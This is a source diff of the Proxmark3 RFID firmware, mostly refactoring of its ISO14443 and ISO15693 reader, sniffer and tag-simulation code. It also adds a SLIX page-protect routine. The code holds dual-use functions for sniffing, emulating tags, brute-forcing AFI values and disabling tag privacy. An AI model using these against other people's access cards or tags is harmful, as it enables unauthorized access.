 // Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
 //
 // This program is free software: you can redistribute it and/or modify
@@ -14,11 +13,10 @@
 //
 // See LICENSE.txt for the text of the license.
 //-----------------------------------------------------------------------------
-#ifndef __LF_HIDFCBRUTE_H
-#define __LF_HIDFCBRUTE_H
 
-#include <stdint.h>
+#ifndef __I2C_DIRECT_H
+#define __I2C_DIRECT_H
 
-void hid_calculate_checksum_and_set(uint32_t *high, uint32_t *low, uint32_t cardnum, uint32_t fc);
+int CmdSmartRaw(const uint8_t prepend, const uint8_t *data, int dlen, uint8_t *output, uint16_t *olen);
 
-#endif /* __LF_HIDFCBRUTE_H */
+#endif

armsrc/iclass.h

@@ -34,6 +34,7 @@
 // times in samples @ 212kHz when acting as reader
 #define ICLASS_READER_TIMEOUT_ACTALL     330 // 1558us, nominal 330us + 7slots*160us = 1450us
 #define ICLASS_READER_TIMEOUT_UPDATE    3390 // 16000us, nominal 4-15ms
+#define ICLASS_READER_TIMEOUT_UPDATE_FAST    1500 // A copy of ICLASS_READER_TIMEOUT_UPDATE with reduced timeout values
 #define ICLASS_READER_TIMEOUT_OTHERS      80 // 380us, nominal 330us
 
 // The length of a received command will in most cases be no more than 18 bytes.
@@ -71,6 +72,6 @@ bool authenticate_iclass_tag(iclass_auth_req_t *payload, picopass_hdr_t *hdr, ui
 uint8_t get_pagemap(const picopass_hdr_t *hdr);
 void iclass_send_as_reader(uint8_t *frame, int len, uint32_t *start_time, uint32_t *end_time, bool shallow_mod);
 
-void generate_single_key_block_inverted(const uint8_t *startingKey, uint32_t index, uint8_t *keyBlock);
 void iClass_Recover(iclass_recover_req_t *msg);
+void iClass_TearBlock(iclass_tearblock_req_t *msg);
 #endif

armsrc/iso14443a.h

@@ -55,7 +55,8 @@ typedef struct {
     uint16_t shiftReg;
     uint16_t samples;
     uint16_t len;
-    uint32_t startTime, endTime;
+    uint32_t startTime;
+    uint32_t endTime;
     uint16_t output_len;
     uint8_t  *output;
     uint8_t  *parity;
@@ -88,7 +89,8 @@ typedef struct {
     uint8_t  parityBits;
     uint8_t  parityLen;
     uint32_t fourBits;
-    uint32_t startTime, endTime;
+    uint32_t startTime;
+    uint32_t endTime;
     uint16_t output_len;
     uint8_t *output;
     uint8_t *parity;
@@ -103,7 +105,7 @@ typedef enum {
     RESP_INDEX_SAKC1,
     RESP_INDEX_SAKC2,
     RESP_INDEX_SAKC3,
-    RESP_INDEX_RATS,
+    RESP_INDEX_ATS,
     RESP_INDEX_VERSION,
     RESP_INDEX_SIGNATURE,
     RESP_INDEX_PPS,
@@ -123,8 +125,8 @@ typedef enum {
 #endif
 
 void printHf14aConfig(void);
-void setHf14aConfig(const hf14a_config *hc);
-hf14a_config *getHf14aConfig(void);
+void setHf14aConfig(const hf14a_config_t *hc);
+hf14a_config_t *getHf14aConfig(void);
 void iso14a_set_timeout(uint32_t timeout);
 uint32_t iso14a_get_timeout(void);
 
@@ -140,21 +142,35 @@ RAMFUNC bool MillerDecoding(uint8_t bit, uint32_t non_real_time);
 RAMFUNC int ManchesterDecoding(uint8_t bit, uint16_t offset, uint32_t non_real_time);
 
 void RAMFUNC SniffIso14443a(uint8_t param);
-void SimulateIso14443aTag(uint8_t tagType, uint16_t flags, uint8_t *data, uint8_t exitAfterNReads);
-bool SimulateIso14443aInit(uint8_t tagType, uint16_t flags, uint8_t *data, tag_response_info_t **responses, uint32_t *cuid, uint32_t counters[3], uint8_t tearings[3], uint8_t *pages);
+void SimulateIso14443aTag(uint8_t tagType, uint16_t flags, uint8_t *useruid, uint8_t exitAfterNReads,
+                          uint8_t *ats, size_t ats_len, bool ulc_part1, bool ulc_part2);
+
+void SimulateIso14443aTagAID(uint8_t tagType, uint16_t flags, uint8_t *uid,
+                             uint8_t *ats, size_t ats_len,  uint8_t *aid, size_t aid_len,
+                             uint8_t *selectaid_response, size_t selectaid_response_len,
+                             uint8_t *getdata_response, size_t getdata_response_len);
+
+bool SimulateIso14443aInit(uint8_t tagType, uint16_t flags, uint8_t *data,
+                           uint8_t *ats, size_t ats_len, tag_response_info_t **responses,
+                           uint32_t *cuid, uint8_t *pages,
+                           uint8_t *ulc_key);
+
 bool GetIso14443aCommandFromReader(uint8_t *received, uint16_t received_maxlen, uint8_t *par, int *len);
 void iso14443a_antifuzz(uint32_t flags);
 void ReaderIso14443a(PacketCommandNG *c);
-void ReaderTransmit(uint8_t *frame, uint16_t len, uint32_t *timing);
-void ReaderTransmitBitsPar(uint8_t *frame, uint16_t bits, uint8_t *par, uint32_t *timing);
-void ReaderTransmitPar(uint8_t *frame, uint16_t len, uint8_t *par, uint32_t *timing);
+void ReaderTransmit(const uint8_t *frame, uint16_t len, uint32_t *timing);
+void ReaderTransmitBitsPar(const uint8_t *frame, uint16_t bits, uint8_t *par, uint32_t *timing);
+void ReaderTransmitPar(const uint8_t *frame, uint16_t len, uint8_t *par, uint32_t *timing);
 uint16_t ReaderReceive(uint8_t *receivedAnswer, uint16_t answer_maxlen, uint8_t *par);
 
 void iso14443a_setup(uint8_t fpga_minor_mode);
 int iso14_apdu(uint8_t *cmd, uint16_t cmd_len, bool send_chaining, void *data, uint16_t data_len, uint8_t *res);
 int iso14443a_select_card(uint8_t *uid_ptr, iso14a_card_select_t *p_card, uint32_t *cuid_ptr, bool anticollision, uint8_t num_cascades, bool no_rats);
-int iso14443a_select_cardEx(uint8_t *uid_ptr, iso14a_card_select_t *p_card, uint32_t *cuid_ptr, bool anticollision, uint8_t num_cascades, bool no_rats, iso14a_polling_parameters_t *polling_parameters);
-int iso14443a_fast_select_card(uint8_t *uid_ptr, uint8_t num_cascades);
+int iso14443a_select_cardEx(uint8_t *uid_ptr, iso14a_card_select_t *p_card, uint32_t *cuid_ptr,
+                            bool anticollision, uint8_t num_cascades, bool no_rats,
+                            const iso14a_polling_parameters_t *polling_parameters, bool force_rats);
+int iso14443a_select_card_for_magic(uint8_t *uid_ptr, iso14a_card_select_t *p_card, uint32_t *cuid_ptr, bool anticollision, uint8_t num_cascades);
+int iso14443a_fast_select_card(const uint8_t *uid_ptr, uint8_t num_cascades);
 void iso14a_set_trigger(bool enable);
 
 int EmSendCmd14443aRaw(const uint8_t *resp, uint16_t respLen);
@@ -169,13 +185,14 @@ int EmSendPrecompiledCmd(tag_response_info_t *p_response);
 bool prepare_allocated_tag_modulation(tag_response_info_t *response_info, uint8_t **buffer, size_t *max_buffer_size);
 bool prepare_tag_modulation(tag_response_info_t *response_info, size_t max_buffer_size);
 
-bool EmLogTrace(uint8_t *reader_data, uint16_t reader_len, uint32_t reader_StartTime, uint32_t reader_EndTime, uint8_t *reader_Parity,
-                uint8_t *tag_data, uint16_t tag_len, uint32_t tag_StartTime, uint32_t tag_EndTime, uint8_t *tag_Parity);
+bool EmLogTrace(const uint8_t *reader_data, uint16_t reader_len, uint32_t reader_StartTime,
+                uint32_t reader_EndTime, const uint8_t *reader_Parity,  const uint8_t *tag_data,
+                uint16_t tag_len, uint32_t tag_StartTime, uint32_t tag_EndTime, const uint8_t *tag_Parity);
 
 void ReaderMifare(bool first_try, uint8_t block, uint8_t keytype);
 void DetectNACKbug(void);
 
-bool GetIso14443aAnswerFromTag_Thinfilm(uint8_t *receivedResponse, uint16_t resp_len, uint8_t *received_len);
+bool GetIso14443aAnswerFromTag_Thinfilm(uint8_t *receivedResponse, uint16_t rec_maxlen, uint8_t *received_len);
 
 extern iso14a_polling_parameters_t WUPA_POLLING_PARAMETERS;
 extern iso14a_polling_parameters_t REQA_POLLING_PARAMETERS;

armsrc/iso14443b.c

@@ -786,14 +786,14 @@ void SimulateIso14443bTag(const uint8_t *pupi) {
 
     // prepare "ATQB" tag answer (encoded):
     CodeIso14443bAsTag(respATQB, sizeof(respATQB));
-    uint8_t *encodedATQB = BigBuf_malloc(ts->max);
+    uint8_t *encodedATQB = BigBuf_calloc(ts->max);
     uint16_t encodedATQBLen = ts->max;
     memcpy(encodedATQB, ts->buf, ts->max);
 
 
     // prepare "OK" tag answer (encoded):
     CodeIso14443bAsTag(respOK, sizeof(respOK));
-    uint8_t *encodedOK = BigBuf_malloc(ts->max);
+    uint8_t *encodedOK = BigBuf_calloc(ts->max);
     uint16_t encodedOKLen = ts->max;
     memcpy(encodedOK, ts->buf, ts->max);
 
@@ -980,7 +980,6 @@ void Simulate_iso14443b_srx_tag(uint8_t *uid) {
     // allocate command receive buffer
     BigBuf_free();
     BigBuf_Clear_ext(false);
-    clear_trace();
     set_tracing(true);
 
     uint16_t len, cmdsReceived = 0;
@@ -989,18 +988,18 @@ void Simulate_iso14443b_srx_tag(uint8_t *uid) {
 
     tosend_t *ts = get_tosend();
 
-    uint8_t *receivedCmd = BigBuf_malloc(MAX_FRAME_SIZE);
+    uint8_t *receivedCmd = BigBuf_calloc(MAX_FRAME_SIZE);
 
     // prepare "ATQB" tag answer (encoded):
     CodeIso14443bAsTag(respATQB, sizeof(respATQB));
-    uint8_t *encodedATQB = BigBuf_malloc(ts->max);
+    uint8_t *encodedATQB = BigBuf_calloc(ts->max);
     uint16_t encodedATQBLen = ts->max;
     memcpy(encodedATQB, ts->buf, ts->max);
 
 
     // prepare "OK" tag answer (encoded):
     CodeIso14443bAsTag(respOK, sizeof(respOK));
-    uint8_t *encodedOK = BigBuf_malloc(ts->max);
+    uint8_t *encodedOK = BigBuf_calloc(ts->max);
     uint16_t encodedOKLen = ts->max;
     memcpy(encodedOK, ts->buf, ts->max);
 
@@ -1337,6 +1336,7 @@ static int Get14443bAnswerFromTag(uint8_t *response, uint16_t max_len, uint32_t
     // The DMA buffer, used to stream samples from the FPGA
     dmabuf16_t *dma = get_dma16();
     if (dma == NULL) {
+        if (g_dbglevel >= DBG_DEBUG) Dbprintf("Failed to allocate memory");
         return PM3_EMALLOC;
     }
 
@@ -1381,12 +1381,12 @@ static int Get14443bAnswerFromTag(uint8_t *response, uint16_t max_len, uint32_t
             if (AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_ENDRX)) {
 
                 // primary buffer was stopped
-                if (AT91C_BASE_PDC_SSC->PDC_RCR == false) {
+                if (AT91C_BASE_PDC_SSC->PDC_RCR == 0) {
                     AT91C_BASE_PDC_SSC->PDC_RPR = (uint32_t) dma->buf;
                     AT91C_BASE_PDC_SSC->PDC_RCR = DMA_BUFFER_SIZE;
                 }
                 // secondary buffer sets as primary, secondary buffer was stopped
-                if (AT91C_BASE_PDC_SSC->PDC_RNCR == false) {
+                if (AT91C_BASE_PDC_SSC->PDC_RNCR == 0) {
                     AT91C_BASE_PDC_SSC->PDC_RNPR = (uint32_t) dma->buf;
                     AT91C_BASE_PDC_SSC->PDC_RNCR = DMA_BUFFER_SIZE;
                 }
@@ -1585,7 +1585,7 @@ static void CodeIso14443bAsReader(const uint8_t *cmd, int len, bool framing) {
 /*
 *  Convenience function to encode, transmit and trace iso 14443b comms
 */
-static void CodeAndTransmit14443bAsReader(const uint8_t *cmd, int len, uint32_t *start_time, uint32_t *eof_time, bool framing) {
+void CodeAndTransmit14443bAsReader(const uint8_t *cmd, int len, uint32_t *start_time, uint32_t *eof_time, bool framing) {
     const tosend_t *ts = get_tosend();
     CodeIso14443bAsReader(cmd, len, framing);
     TransmitFor14443b_AsReader(start_time);
@@ -1800,7 +1800,7 @@ static int iso14443b_select_cts_card(iso14b_cts_card_select_t *card) {
 /**
 * SRx Initialise.
 */
-static int iso14443b_select_srx_card(iso14b_card_select_t *card) {
+int iso14443b_select_srx_card(iso14b_card_select_t *card) {
     // INITIATE command: wake up the tag using the INITIATE
     static const uint8_t init_srx[] = { ISO14443B_INITIATE, 0x00, 0x97, 0x5b };
     uint8_t r_init[3] = { 0x00 };
@@ -2135,6 +2135,9 @@ static int iso14443b_select_picopass_card(picopass_hdr_t *hdr) {
     static uint8_t act_all[] = { ICLASS_CMD_ACTALL };
     static uint8_t identify[] = { ICLASS_CMD_READ_OR_IDENTIFY };
     static uint8_t read_conf[] = { ICLASS_CMD_READ_OR_IDENTIFY, 0x01, 0xfa, 0x22 };
+
+    // ICLASS_CMD_SELECT  0x81 tells  ISO14443b/BPSK coding/106 kbits/s
+    // ICLASS_CMD_SELECT  0x41 tells  ISO14443b/BPSK coding/423 kbits/s
     uint8_t select[] = { 0x80 | ICLASS_CMD_SELECT, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
     uint8_t read_aia[] = { ICLASS_CMD_READ_OR_IDENTIFY, 0x05, 0xde, 0x64};
     uint8_t read_check_cc[] = { 0x80 | ICLASS_CMD_READCHECK, 0x02 };
@@ -2307,7 +2310,7 @@ void iso14443b_setup(void) {
 //
 // I tried to be systematic and check every answer of the tag, every CRC, etc...
 //-----------------------------------------------------------------------------
-static int read_14b_srx_block(uint8_t blocknr, uint8_t *block) {
+int read_14b_srx_block(uint8_t blocknr, uint8_t *block) {
 
     uint8_t cmd[] = {ISO14443B_READ_BLK, blocknr, 0x00, 0x00};
     AddCrc14B(cmd, 2);
@@ -2402,8 +2405,8 @@ void SniffIso14443b(void) {
     uint8_t ua_buf[MAX_FRAME_SIZE] = {0};
     Uart14bInit(ua_buf);
 
-    //Demod14bInit(BigBuf_malloc(MAX_FRAME_SIZE), MAX_FRAME_SIZE);
-    //Uart14bInit(BigBuf_malloc(MAX_FRAME_SIZE));
+    //Demod14bInit(BigBuf_calloc(MAX_FRAME_SIZE));
+    //Uart14bInit(BigBuf_calloc(MAX_FRAME_SIZE));
 
     // Set FPGA in the appropriate mode
     FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_READER | FPGA_HF_READER_SUBCARRIER_848_KHZ | FPGA_HF_READER_MODE_SNIFF_IQ);
@@ -2463,12 +2466,12 @@ void SniffIso14443b(void) {
             if (AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_ENDRX)) {
 
                 // primary buffer was stopped
-                if (AT91C_BASE_PDC_SSC->PDC_RCR == false) {
+                if (AT91C_BASE_PDC_SSC->PDC_RCR == 0) {
                     AT91C_BASE_PDC_SSC->PDC_RPR = (uint32_t) dma->buf;
                     AT91C_BASE_PDC_SSC->PDC_RCR = DMA_BUFFER_SIZE;
                 }
                 // secondary buffer sets as primary, secondary buffer was stopped
-                if (AT91C_BASE_PDC_SSC->PDC_RNCR == false) {
+                if (AT91C_BASE_PDC_SSC->PDC_RNCR == 0) {
                     AT91C_BASE_PDC_SSC->PDC_RNPR = (uint32_t) dma->buf;
                     AT91C_BASE_PDC_SSC->PDC_RNCR = DMA_BUFFER_SIZE;
                 }
@@ -2578,7 +2581,6 @@ void SendRawCommand14443B(iso14b_raw_cmd_t *p) {
 
     if ((p->flags & ISO14B_CLEARTRACE) == ISO14B_CLEARTRACE) {
         clear_trace();
-        BigBuf_Clear_ext(false);
     }
 
     set_tracing(true);

armsrc/iso14443b.h

@@ -45,8 +45,11 @@ int iso14443b_select_card(iso14b_card_select_t *card);
 
 void SimulateIso14443bTag(const uint8_t *pupi);
 void read_14b_st_block(uint8_t blocknr);
+int read_14b_srx_block(uint8_t blocknr, uint8_t *block);
+int iso14443b_select_srx_card(iso14b_card_select_t *card);
 void SniffIso14443b(void);
 void SendRawCommand14443B(iso14b_raw_cmd_t *p);
+void CodeAndTransmit14443bAsReader(const uint8_t *cmd, int len, uint32_t *start_time, uint32_t *eof_time, bool framing);
 
 // States for 14B SIM command
 #define SIM_POWER_OFF   0

armsrc/iso15693.c

@@ -180,8 +180,7 @@ static void CodeIso15693AsReaderEOF(void) {
 
 static int get_uid_slix(uint32_t start_time, uint32_t *eof_time, uint8_t *uid) {
 
-    uint8_t *answer = BigBuf_malloc(ISO15693_MAX_RESPONSE_LENGTH);
-    memset(answer, 0x00, ISO15693_MAX_RESPONSE_LENGTH);
+    uint8_t *answer = BigBuf_calloc(ISO15693_MAX_RESPONSE_LENGTH);
 
     start_time = *eof_time + DELAY_ISO15693_VICC_TO_VCD_READER;
 
@@ -985,10 +984,11 @@ int GetIso15693AnswerFromTag(uint8_t *response, uint16_t max_len, uint16_t timeo
     DecodeTagFSK_t dtfm = { 0 };
     DecodeTagFSK_t *dtf = &dtfm;
 
-    if (fsk)
+    if (fsk) {
         DecodeTagFSKInit(dtf, response, max_len);
-    else
+    } else {
         DecodeTagInit(dt, response, max_len);
+    }
 
     // wait for last transfer to complete
     while (!(AT91C_BASE_SSC->SSC_SR & AT91C_SSC_TXEMPTY));
@@ -1014,8 +1014,9 @@ int GetIso15693AnswerFromTag(uint8_t *response, uint16_t max_len, uint16_t timeo
     for (;;) {
 
         volatile uint16_t behindBy = ((uint16_t *)AT91C_BASE_PDC_SSC->PDC_RPR - upTo) & (DMA_BUFFER_SIZE - 1);
-        if (behindBy == 0)
+        if (behindBy == 0) {
             continue;
+        }
 
         samples++;
         if (samples == 1) {
@@ -1032,12 +1033,12 @@ int GetIso15693AnswerFromTag(uint8_t *response, uint16_t max_len, uint16_t timeo
             if (AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_ENDRX)) {
 
                 // primary buffer was stopped
-                if (AT91C_BASE_PDC_SSC->PDC_RCR == false) {
+                if (AT91C_BASE_PDC_SSC->PDC_RCR == 0) {
                     AT91C_BASE_PDC_SSC->PDC_RPR = (uint32_t) dma->buf;
                     AT91C_BASE_PDC_SSC->PDC_RCR = DMA_BUFFER_SIZE;
                 }
                 // secondary buffer sets as primary, secondary buffer was stopped
-                if (AT91C_BASE_PDC_SSC->PDC_RNCR == false) {
+                if (AT91C_BASE_PDC_SSC->PDC_RNCR == 0) {
                     AT91C_BASE_PDC_SSC->PDC_RNPR = (uint32_t) dma->buf;
                     AT91C_BASE_PDC_SSC->PDC_RNCR = DMA_BUFFER_SIZE;
                 }
@@ -1482,7 +1483,7 @@ int GetIso15693CommandFromReader(uint8_t *received, size_t max_len, uint32_t *eo
     bool gotFrame = false;
 
     // the decoder data structure
-    DecodeReader_t *dr = (DecodeReader_t *)BigBuf_malloc(sizeof(DecodeReader_t));
+    DecodeReader_t *dr = (DecodeReader_t *)BigBuf_calloc(sizeof(DecodeReader_t));
     DecodeReaderInit(dr, received, max_len, 0, NULL);
 
     // wait for last transfer to complete
@@ -1587,7 +1588,7 @@ void AcquireRawAdcSamplesIso15693(void) {
 
     LED_A_ON();
 
-    uint8_t *dest = BigBuf_malloc(4000);
+    uint8_t *dest = BigBuf_calloc(4096);
 
     // switch field on
     FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_READER);
@@ -1708,12 +1709,12 @@ void SniffIso15693(uint8_t jam_search_len, uint8_t *jam_search_string, bool icla
             if (AT91C_BASE_SSC->SSC_SR & (AT91C_SSC_ENDRX)) {
 
                 // primary buffer was stopped
-                if (AT91C_BASE_PDC_SSC->PDC_RCR == false) {
+                if (AT91C_BASE_PDC_SSC->PDC_RCR == 0) {
                     AT91C_BASE_PDC_SSC->PDC_RPR = (uint32_t) dma->buf;
                     AT91C_BASE_PDC_SSC->PDC_RCR = DMA_BUFFER_SIZE;
                 }
                 // secondary buffer sets as primary, secondary buffer was stopped
-                if (AT91C_BASE_PDC_SSC->PDC_RNCR == false) {
+                if (AT91C_BASE_PDC_SSC->PDC_RNCR == 0) {
                     AT91C_BASE_PDC_SSC->PDC_RNPR = (uint32_t) dma->buf;
                     AT91C_BASE_PDC_SSC->PDC_RNCR = DMA_BUFFER_SIZE;
                 }
@@ -2029,7 +2030,7 @@ void ReaderIso15693(iso15_card_select_t *p_card) {
     LED_A_ON();
     set_tracing(true);
 
-    uint8_t *answer = BigBuf_malloc(ISO15693_MAX_RESPONSE_LENGTH);
+    uint8_t *answer = BigBuf_calloc(ISO15693_MAX_RESPONSE_LENGTH);
     memset(answer, 0x00, ISO15693_MAX_RESPONSE_LENGTH);
 
     // FIRST WE RUN AN INVENTORY TO GET THE TAG UID
@@ -2117,14 +2118,6 @@ void Iso15693InitTag(void) {
     StartCountSspClk();
 }
 
-void EmlClearIso15693(void) {
-    // Resetting the bitstream also frees the BigBuf memory, so we do this here to prevent
-    // an inconvenient reset in the future by Iso15693InitTag
-    FpgaDownloadAndGo(FPGA_BITSTREAM_HF_15);
-    BigBuf_Clear_EM();
-    reply_ng(CMD_HF_ISO15693_EML_CLEAR, PM3_SUCCESS, NULL, 0);
-}
-
 // Simulate an ISO15693 TAG, perform anti-collision and then print any reader commands
 // all demodulation performed in arm rather than host. - greg
 void SimTagIso15693(const uint8_t *uid, uint8_t block_size) {
@@ -2137,7 +2130,7 @@ void SimTagIso15693(const uint8_t *uid, uint8_t block_size) {
 
     iso15_tag_t *tag = (iso15_tag_t *) BigBuf_get_EM_addr();
     if (tag == NULL) {
-        Dbprintf("Can't allocate emulator memory");
+        if (g_dbglevel >= DBG_DEBUG) Dbprintf("Failed to allocate memory");
         reply_ng(CMD_HF_ISO15693_SIMULATE, PM3_EFAILED, NULL, 0);
         return;
     }
@@ -2665,7 +2658,7 @@ void BruteforceIso15693Afi(uint32_t flags) {
             Dbprintf("AFI = %i  UID = %s", i, iso15693_sprintUID(NULL, recv + 2));
         }
 
-        aborted = (BUTTON_PRESS() && data_available());
+        aborted = (BUTTON_PRESS() || data_available());
         if (aborted) {
             break;
         }
@@ -2775,10 +2768,10 @@ void LockPassSlixIso15693(uint32_t pass_id, uint32_t password) {
     LED_A_ON();
 
     uint8_t cmd_inventory[]  = {ISO15693_REQ_DATARATE_HIGH | ISO15693_REQ_INVENTORY | ISO15693_REQINV_SLOT1, 0x01, 0x00, 0x00, 0x00 };
-    uint8_t cmd_get_rnd[]    = {ISO15693_REQ_DATARATE_HIGH, 0xB2, 0x04, 0x00, 0x00 };
-    uint8_t cmd_set_pass[]   = {ISO15693_REQ_DATARATE_HIGH, 0xB3, 0x04, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
-    //uint8_t cmd_write_pass[] = {ISO15693_REQ_DATARATE_HIGH | ISO15693_REQ_ADDRESS, 0xB4, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
-    uint8_t cmd_lock_pass[] = {ISO15693_REQ_DATARATE_HIGH | ISO15693_REQ_ADDRESS, 0xB5, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00 };
+    uint8_t cmd_get_rnd[]    = {ISO15693_REQ_DATARATE_HIGH, ISO15693_GET_RANDOM_NUMBER, 0x04, 0x00, 0x00 };
+    uint8_t cmd_set_pass[]   = {ISO15693_REQ_DATARATE_HIGH, ISO15693_SET_PASSWORD, 0x04, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+    //uint8_t cmd_write_pass[] = {ISO15693_REQ_DATARATE_HIGH | ISO15693_REQ_ADDRESS, ISO15693_WRITE_PASSWORD, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+    uint8_t cmd_lock_pass[] = {ISO15693_REQ_DATARATE_HIGH | ISO15693_REQ_ADDRESS, ISO15693_LOCK_PASSWORD, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00 };
     uint16_t crc;
     uint16_t recvlen = 0;
     uint8_t recvbuf[ISO15693_MAX_RESPONSE_LENGTH];
@@ -3028,14 +3021,7 @@ static uint32_t disable_privacy_15693_Slix(uint32_t start_time, uint32_t *eof_ti
     return PM3_SUCCESS;
 }
 
-static uint32_t set_pass_15693_Slix(uint32_t start_time, uint32_t *eof_time, uint8_t pass_id, const uint8_t *password, const uint8_t *uid) {
-
-
-    uint8_t rnd[2];
-    if (get_rnd_15693_Slix(start_time, eof_time, rnd) == false) {
-        return PM3_ETIMEOUT;
-    }
-
+static uint32_t set_pass_15693_SlixRnd(uint32_t start_time, uint32_t *eof_time, uint8_t pass_id, const uint8_t *password, const uint8_t *uid, uint8_t *rnd) {
     // 0x04, == NXP from manufacture id list.
     uint8_t c[] = { (ISO15_REQ_DATARATE_HIGH | ISO15_REQ_ADDRESS), ISO15693_SET_PASSWORD, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, pass_id, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
 
@@ -3055,6 +3041,18 @@ static uint32_t set_pass_15693_Slix(uint32_t start_time, uint32_t *eof_time, uin
     return PM3_SUCCESS;
 }
 
+static uint32_t set_pass_15693_Slix(uint32_t start_time, uint32_t *eof_time, uint8_t pass_id, const uint8_t *password, const uint8_t *uid) {
+
+
+    uint8_t rnd[2];
+    if (get_rnd_15693_Slix(start_time, eof_time, rnd) == false) {
+        return PM3_ETIMEOUT;
+    }
+
+    return set_pass_15693_SlixRnd(start_time, eof_time, pass_id, password, uid, rnd);
+}
+
+
 static uint32_t set_privacy_15693_Slix(uint32_t start_time, uint32_t *eof_time, const uint8_t *password) {
     uint8_t rnd[2];
     if (get_rnd_15693_Slix(start_time, eof_time, rnd) == false) {
@@ -3062,7 +3060,7 @@ static uint32_t set_privacy_15693_Slix(uint32_t start_time, uint32_t *eof_time,
     }
 
     // 0x04, == NXP from manufacture id list.
-    uint8_t c[] = { ISO15_REQ_DATARATE_HIGH, 0xBA, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
+    uint8_t c[] = { ISO15_REQ_DATARATE_HIGH, ISO15693_ENABLE_PRIVACY, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
     init_password_15693_Slix(&c[3], password, rnd);
     AddCrc15(c, 7);
 
@@ -3096,7 +3094,7 @@ static uint32_t disable_eas_15693_Slix(uint32_t start_time, uint32_t *eof_time,
     }
 
     // 0x04, == NXP from manufacture id list.
-    uint8_t c[] = { ISO15_REQ_DATARATE_HIGH, 0xA3, 0x04, 0x00, 0x00};
+    uint8_t c[] = { ISO15_REQ_DATARATE_HIGH, ISO15693_RESET_EAS, 0x04, 0x00, 0x00};
     AddCrc15(c, 3);
 
     start_time = *eof_time + DELAY_ISO15693_VICC_TO_VCD_READER;
@@ -3127,7 +3125,7 @@ static uint32_t enable_eas_15693_Slix(uint32_t start_time, uint32_t *eof_time, c
         }
     }
     // 0x04, == NXP from manufacture id list.
-    uint8_t c[] = { ISO15_REQ_DATARATE_HIGH, 0xA2, 0x04, 0x00, 0x00};
+    uint8_t c[] = { ISO15_REQ_DATARATE_HIGH, ISO15693_SET_EAS, 0x04, 0x00, 0x00};
     //init_password_15693_Slix(&c[3], password, rnd);
     AddCrc15(c, 3);
 
@@ -3162,6 +3160,26 @@ static uint32_t write_password_15693_Slix(uint32_t start_time, uint32_t *eof_tim
     return PM3_SUCCESS;
 }
 
+static uint32_t protect_page_15693_Slix(uint32_t start_time, uint32_t *eof_time, uint8_t divide_ptr, uint8_t prot_status, const uint8_t *uid) {
+
+    uint8_t protect_cmd[] = { (ISO15_REQ_DATARATE_HIGH | ISO15_REQ_ADDRESS), ISO15693_PROTECT_PAGE, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, divide_ptr, prot_status, 0x00, 0x00};
+
+    memcpy(&protect_cmd[3], uid, 8);
+
+    AddCrc15(protect_cmd, 13);
+
+    start_time = *eof_time + DELAY_ISO15693_VICC_TO_VCD_READER;
+    uint8_t recvbuf[ISO15693_MAX_RESPONSE_LENGTH];
+    uint16_t recvlen = 0;
+
+    int res_wrp = SendDataTag(protect_cmd, sizeof(protect_cmd), false, true, recvbuf, sizeof(recvbuf), start_time, ISO15693_READER_TIMEOUT_WRITE, eof_time, &recvlen);
+    if (res_wrp != PM3_SUCCESS && recvlen != 3) {
+        return PM3_EWRONGANSWER;
+    }
+
+    return PM3_SUCCESS;
+}
+
 static uint32_t pass_protect_EASAFI_15693_Slix(uint32_t start_time, uint32_t *eof_time, bool set_option_flag, const uint8_t *password) {
 
     uint8_t flags;
@@ -3262,6 +3280,37 @@ void WritePasswordSlixIso15693(const uint8_t *old_password, const uint8_t *new_p
 
 }
 
+void ProtectPageSlixIso15693(const uint8_t *read_password, const uint8_t *write_password, uint8_t divide_ptr, uint8_t prot_status) {
+    LED_D_ON();
+    Iso15693InitReader();
+    StartCountSspClk();
+    uint32_t start_time = 0, eof_time = 0;
+    int res = PM3_SUCCESS;
+
+    uint8_t uid[8], rnd[2];
+    get_uid_slix(start_time, &eof_time, uid);
+
+    if (get_rnd_15693_Slix(start_time, &eof_time, rnd) == false) {
+        reply_ng(CMD_HF_ISO15693_SLIX_PROTECT_PAGE, PM3_ETIMEOUT, NULL, 0);
+        switch_off();
+        return;
+    }
+
+    if (read_password)
+        res = set_pass_15693_SlixRnd(start_time, &eof_time, 0x01, read_password, uid, rnd);
+
+    if (res == PM3_SUCCESS && write_password)
+        res = set_pass_15693_SlixRnd(start_time, &eof_time, 0x02, write_password, uid, rnd);
+
+    if (res == PM3_SUCCESS)
+        res = protect_page_15693_Slix(start_time, &eof_time, divide_ptr, prot_status, uid);
+
+    reply_ng(CMD_HF_ISO15693_SLIX_PROTECT_PAGE, res, NULL, 0);
+
+    switch_off();
+
+}
+
 void DisablePrivacySlixIso15693(const uint8_t *password) {
     LED_D_ON();
     Iso15693InitReader();

armsrc/iso15693.h

@@ -46,7 +46,6 @@ int GetIso15693AnswerFromTag(uint8_t *response, uint16_t max_len, uint16_t timeo
 //void RecordRawAdcSamplesIso15693(void);
 void AcquireRawAdcSamplesIso15693(void);
 void ReaderIso15693(iso15_card_select_t *p_card); // ISO15693 reader
-void EmlClearIso15693(void);
 void SimTagIso15693(const uint8_t *uid, uint8_t block_size); // simulate an ISO15693 tag
 void BruteforceIso15693Afi(uint32_t flags); // find an AFI of a tag
